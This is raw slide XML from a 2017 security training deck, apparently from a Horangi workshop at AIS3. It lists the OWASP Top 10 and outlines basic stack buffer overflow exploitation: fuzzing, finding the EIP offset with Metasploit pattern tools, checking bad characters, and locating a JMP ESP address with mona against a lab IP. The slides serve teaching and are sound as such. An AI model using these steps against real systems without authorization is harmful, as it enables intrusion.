              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fuzz application to discover vulnerable area. Ensure enough space for shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.119.129 9999</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use pattern create/offset to identify position of EIP register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>-framework/tools/exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
              <a:t>pattern_create.rb</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>-framework/tools/exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
              <a:t>pattern_offset.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for bad characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>accessible, reliable address in memory that contains an instruction such as JMP ESP to get to shellcode in ESP (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mona</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>  modules) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>No memory protection, address has no bad characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Locate executables loaded with the application “e”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Look for commands such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, ret. Otherwise, search outside of executable areas if no memory protections.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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>OWASP Top 10 - 201</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>(2017 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>RC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t> in discussion)</a:t>
            </a:r>
            <a:endParaRPr lang="ko" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="337" name="Shape 337"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1270001"/>
            <a:ext cx="8229600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Shape 338"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2956591" y="1270001"/>
            <a:ext cx="5730300" cy="45600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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339" name="Shape 339"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1696535"/>
            <a:ext cx="2040600" cy="2486100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>Whenever “top web vulnerabilities” is mentioned, we cannot avoid mention of OWASP.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="Shape 340"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2813000" y="1875700"/>
            <a:ext cx="6262500" cy="2111100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Broken Authentication and Session Management</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Insecure Direct Object References</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Sensitive Data Exposure</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Missing Function Level Access Control</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Using Components with Known Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t> Redirects and Forwards</a:t>
            </a:r>
            <a:endParaRPr lang="ko" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="20252D"/>
              </a:solidFill>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="341" name="Shape 341"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7724117" y="4592496"/>
            <a:ext cx="829082" cy="3160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3" name="Shape 643"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="457200"/>
            <a:ext cx="1416049" cy="538981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644" name="Shape 644"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450437" y="1882081"/>
            <a:ext cx="8229600" cy="1379400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="9000" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Let’s go.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Shape 645"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4291584"/>
            <a:ext cx="8229600" cy="475678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>August/Sept 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>AIS3 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Horangi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Taiwan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Shape 646"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="822960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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>Not for public distribution • Copyright 201</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t> Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED4D42FF-02B2-414A-ABD2-F70F27268873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="802432" y="1352939"/>
            <a:ext cx="7573471" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic Buffer Overflow Steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>In this case, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>nasm_shell.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to generate opcode for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (FFE4), and !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mona</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> find –s “\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
